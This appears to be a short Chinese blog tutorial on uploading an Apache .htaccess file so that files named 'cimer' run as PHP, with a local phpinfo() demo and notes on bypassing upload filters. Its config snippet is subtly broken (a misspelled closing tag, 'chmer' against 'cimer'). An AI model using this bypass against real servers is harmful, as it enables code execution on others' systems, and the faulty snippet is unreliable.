.htaccess文件上传

taccess文件(或者"分布式配置文件"), 全称是Hypertext Access(超文本入口), 是Apache服务器中的一个配置文件, 负责相关目录下的网页配置, 了针对目录改变配置的方法, 即在一个特定的文档目录中放置一个包含一个或多个指令的文件, 作用于此目录及其所有子目录, 通过.htaccess文件可以实现网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

原理

<FilesMatch "cimer">
Sethandler application/x-httpd-php
</Eilesmatch >

通过.htaccess文件, 调用php的解析器解析一个包含‘chmer‘这个字符串的任意文件

案例

  1. 创建.htaccess文件

     <FilesMatch "cimer">
     Sethandler application/x-httpd-php
     </Eilesmatch >
    
  2. 创建cimer.html文件

     <?php
     phpinfo();
     ?>
    
  3. 直接访问 http://127.0.0.1/cimer.html ,就会出现phpinfo的界面

利用

  1. 通过上传 .htaccess 文件, 直接修改解析规则
  2. 绕过文件上传漏洞防护

.htaccess文件上传

上一篇:mysql知识点归纳-定时器篇


下一篇:程序运行基本概念和认识OllyDbg 二